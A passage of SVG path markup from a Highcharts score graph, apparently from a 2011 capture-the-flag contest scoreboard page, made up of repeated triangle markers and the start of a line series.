131.18 L 377.5 139.18 369.5 139.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 372 133.18 L 376 141.18 368 141.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 370.5 138.68 L 374.5 146.68 366.5 146.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 369 139.68 L 373 147.68 365 147.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 143.68 L 371.5 151.68 363.5 151.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 366 145.68 L 370 153.68 362 153.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 364.5 145.68 L 368.5 153.68 360.5 153.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 363 147.68 L 367 155.68 359 155.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 150.68 L 365.5 158.68 357.5 158.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 360 153.18 L 364 161.18 356 161.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 358.5 155.68 L 362.5 163.68 354.5 163.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 357 156.18 L 361 164.18 353 164.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 156.18 L 359.5 164.18 351.5 164.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 354 157.68 L 358 165.68 350 165.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 352.5 159.18 L 356.5 167.18 348.5 167.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 351 161.68 L 355 169.68 347 169.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 349 162.68 L 353 170.68 345 170.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 166.68 L 351.5 174.68 343.5 174.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 346 171.18 L 350 179.18 342 179.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 344.5 173.68 L 348.5 181.68 340.5 181.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 343 174.18 L 347 182.18 339 182.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 178.18 L 345.5 186.18 337.5 186.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 340 180.68 L 344 188.68 336 188.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 338.5 182.68 L 342.5 190.68 334.5 190.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 337 184.68 L 341 192.68 333 192.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 335.5 184.68 L 339.5 192.68 331.5 192.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 334 187.18 L 338 195.18 330 195.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 332.5 188.68 L 336.5 196.68 328.5 196.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 331 189.68 L 335 197.68 327 197.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 329.5 189.68 L 333.5 197.68 325.5 197.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 328 189.68 L 332 197.68 324 197.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 326.5 189.68 L 330.5 197.68 322.5 197.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 325 189.68 L 329 197.68 321 197.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 323.5 189.68 L 327.5 197.68 319.5 197.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 321.5 194.18 L 325.5 202.18 317.5 202.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 320 195.68 L 324 203.68 316 203.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 318.5 197.18 L 322.5 205.18 314.5 205.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 317 198.18 L 321 206.18 313 206.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 315.5 199.68 L 319.5 207.68 311.5 207.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 314 202.18 L 318 210.18 310 210.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 312.5 203.68 L 316.5 211.68 308.5 211.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 311 205.18 L 315 213.18 307 213.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 309.5 205.18 L 313.5 213.18 305.5 213.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 308 205.18 L 312 213.18 304 213.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 306.5 205.18 L 310.5 213.18 302.5 213.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 305 205.18 L 309 213.18 301 213.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 303.5 205.18 L 307.5 213.18 299.5 213.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 302 205.68 L 306 213.68 298 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 205.68 L 304.5 213.68 296.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 299 205.68 L 303 213.68 295 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 297.5 205.68 L 301.5 213.68 293.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 296 205.68 L 300 213.68 292 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 294 205.68 L 298 213.68 290 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 205.68 L 296.5 213.68 288.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 291 205.68 L 295 213.68 287 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 289.5 205.68 L 293.5 213.68 285.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 288 205.68 L 292 213.68 284 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 205.68 L 290.5 213.68 282.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 285 205.68 L 289 213.68 281 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 283.5 205.68 L 287.5 213.68 279.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 282 205.68 L 286 213.68 278 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 205.68 L 284.5 213.68 276.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 279 205.68 L 283 213.68 275 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 277.5 205.68 L 281.5 213.68 273.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 276 205.68 L 280 213.68 272 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 205.68 L 278.5 213.68 270.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 273 205.68 L 277 213.68 269 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 271.5 205.68 L 275.5 213.68 267.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 270 205.68 L 274 213.68 266 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 205.68 L 272.5 213.68 264.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 205.68 L 270.5 213.68 262.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 265 205.68 L 269 213.68 261 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 263.5 205.68 L 267.5 213.68 259.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 262 205.68 L 266 213.68 258 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 205.68 L 264.5 213.68 256.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 259 205.68 L 263 213.68 255 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 257.5 205.68 L 261.5 213.68 253.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 256 205.68 L 260 213.68 252 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 254.5 205.68 L 258.5 213.68 250.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 253 205.68 L 257 213.68 249 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 251.5 205.68 L 255.5 213.68 247.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 250 205.68 L 254 213.68 246 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 248.5 205.68 L 252.5 213.68 244.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 247 205.68 L 251 213.68 243 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 245.5 205.68 L 249.5 213.68 241.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 244 205.68 L 248 213.68 240 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 242.5 205.68 L 246.5 213.68 238.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 241 205.68 L 245 213.68 237 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 239 205.68 L 243 213.68 235 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 237.5 205.68 L 241.5 213.68 233.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 236 205.68 L 240 213.68 232 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 234.5 205.68 L 238.5 213.68 230.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 233 205.68 L 237 213.68 229 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 231.5 205.68 L 235.5 213.68 227.5 213.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 230 206.68 L 234 214.68 226 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 228.5 206.68 L 232.5 214.68 224.5 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 227 206.68 L 231 214.68 223 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 225.5 206.68 L 229.5 214.68 221.5 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 224 206.68 L 228 214.68 220 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 222.5 206.68 L 226.5 214.68 218.5 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 221 206.68 L 225 214.68 217 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 206.68 L 223.5 214.68 215.5 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 218 206.68 L 222 214.68 214 214.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 216.5 207.18 L 220.5 215.18 212.5 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 215 207.18 L 219 215.18 211 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 207.18 L 217.5 215.18 209.5 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 207.18 L 215.5 215.18 207.5 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 210 207.18 L 214 215.18 206 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 208.5 207.18 L 212.5 215.18 204.5 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 207 207.18 L 211 215.18 203 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 207.18 L 209.5 215.18 201.5 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 204 207.18 L 208 215.18 200 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 202.5 207.18 L 206.5 215.18 198.5 215.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 201 210.68 L 205 218.68 197 218.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 213.68 L 203.5 221.68 195.5 221.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 198 216.68 L 202 224.68 194 224.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 196.5 219.18 L 200.5 227.18 192.5 227.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 195 220.68 L 199 228.68 191 228.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 225.68 L 197.5 233.68 189.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 192 225.68 L 196 233.68 188 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 190.5 225.68 L 194.5 233.68 186.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 189 225.68 L 193 233.68 185 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 225.68 L 191.5 233.68 183.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 225.68 L 189.5 233.68 181.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 184 225.68 L 188 233.68 180 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 182.5 225.68 L 186.5 233.68 178.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 181 225.68 L 185 233.68 177 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 225.68 L 183.5 233.68 175.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 178 225.68 L 182 233.68 174 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 176.5 231.68 L 180.5 239.68 172.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 175 231.68 L 179 239.68 171 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 173.5 231.68 L 177.5 239.68 169.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 172 231.68 L 176 239.68 168 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 170.5 231.68 L 174.5 239.68 166.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 169 231.68 L 173 239.68 165 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 167.5 231.68 L 171.5 239.68 163.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 166 231.68 L 170 239.68 162 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 164.5 231.68 L 168.5 239.68 160.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 163 231.68 L 167 239.68 159 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 161.5 231.68 L 165.5 239.68 157.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 160 231.68 L 164 239.68 156 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 158 231.68 L 162 239.68 154 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 156.5 231.68 L 160.5 239.68 152.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 155 231.68 L 159 239.68 151 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 153.5 231.68 L 157.5 239.68 149.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 152 231.68 L 156 239.68 148 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 150.5 231.68 L 154.5 239.68 146.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 149 231.68 L 153 239.68 145 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 147.5 231.68 L 151.5 239.68 143.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 146 231.68 L 150 239.68 142 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 144.5 231.68 L 148.5 239.68 140.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 143 231.68 L 147 239.68 139 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 141.5 231.68 L 145.5 239.68 137.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 140 231.68 L 144 239.68 136 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 231.68 L 142.5 239.68 134.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 137 231.68 L 141 239.68 133 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 135.5 231.68 L 139.5 239.68 131.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 134 231.68 L 138 239.68 130 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 231.68 L 136.5 239.68 128.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 231.68 L 134.5 239.68 126.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 129 231.68 L 133 239.68 125 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 127.5 231.68 L 131.5 239.68 123.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 126 231.68 L 130 239.68 122 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 231.68 L 128.5 239.68 120.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 123 231.68 L 127 239.68 119 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 121.5 231.68 L 125.5 239.68 117.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 120 231.68 L 124 239.68 116 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 231.68 L 122.5 239.68 114.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 117 231.68 L 121 239.68 113 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 115.5 231.68 L 119.5 239.68 111.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 114 231.68 L 118 239.68 110 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 231.68 L 116.5 239.68 108.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 111 231.68 L 115 239.68 107 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 109.5 231.68 L 113.5 239.68 105.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 108 231.68 L 112 239.68 104 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 231.68 L 110.5 239.68 102.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 105 231.68 L 109 239.68 101 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 103 231.68 L 107 239.68 99 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 101.5 231.68 L 105.5 239.68 97.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 100 231.68 L 104 239.68 96 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 231.68 L 102.5 239.68 94.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 97 231.68 L 101 239.68 93 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 95.5 231.68 L 99.5 239.68 91.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 94 231.68 L 98 239.68 90 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 92.5 231.68 L 96.5 239.68 88.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 91 231.68 L 95 239.68 87 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 89.5 231.68 L 93.5 239.68 85.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 88 231.68 L 92 239.68 84 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 86.5 231.68 L 90.5 239.68 82.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 85 231.68 L 89 239.68 81 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 83.5 231.68 L 87.5 239.68 79.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 82 231.68 L 86 239.68 78 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 80.5 231.68 L 84.5 239.68 76.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 79 231.68 L 83 239.68 75 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 77.5 231.68 L 81.5 239.68 73.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 75.5 231.68 L 79.5 239.68 71.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 74 231.68 L 78 239.68 70 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 72.5 231.68 L 76.5 239.68 68.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 71 231.68 L 75 239.68 67 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 69.5 231.68 L 73.5 239.68 65.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 68 231.68 L 72 239.68 64 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 66.5 231.68 L 70.5 239.68 62.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 65 231.68 L 69 239.68 61 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 63.5 231.68 L 67.5 239.68 59.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 62 231.68 L 66 239.68 58 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 60.5 231.68 L 64.5 239.68 56.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 59 231.68 L 63 239.68 55 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 231.68 L 61.5 239.68 53.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 56 231.68 L 60 239.68 52 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 54.5 231.68 L 58.5 239.68 50.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 53 231.68 L 57 239.68 49 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 231.68 L 55.5 239.68 47.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 50 231.68 L 54 239.68 46 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 48 231.68 L 52 239.68 44 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 46.5 231.68 L 50.5 239.68 42.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 45 231.68 L 49 239.68 41 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 231.68 L 47.5 239.68 39.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 42 231.68 L 46 239.68 38 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 40.5 231.68 L 44.5 239.68 36.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 39 231.68 L 43 239.68 35 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 231.68 L 41.5 239.68 33.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 36 231.68 L 40 239.68 32 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 34.5 231.68 L 38.5 239.68 30.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 33 231.68 L 37 239.68 29 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 231.68 L 35.5 239.68 27.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 30 231.68 L 34 239.68 26 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 28.5 231.68 L 32.5 239.68 24.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 27 231.68 L 31 239.68 23 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 231.68 L 29.5 239.68 21.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 24 231.68 L 28 239.68 20 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 22 231.68 L 26 239.68 18 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 20.5 231.68 L 24.5 239.68 16.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 19 231.68 L 23 239.68 15 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 231.68 L 21.5 239.68 13.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 16 231.68 L 20 239.68 12 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 14.5 231.68 L 18.5 239.68 10.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 13 231.68 L 17 239.68 9 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 11.5 231.68 L 15.5 239.68 7.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 10 231.68 L 14 239.68 6 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 8.5 231.68 L 12.5 239.68 4.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 7 231.68 L 11 239.68 3 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 5.5 231.68 L 9.5 239.68 1.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 4 231.68 L 8 239.68 0 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 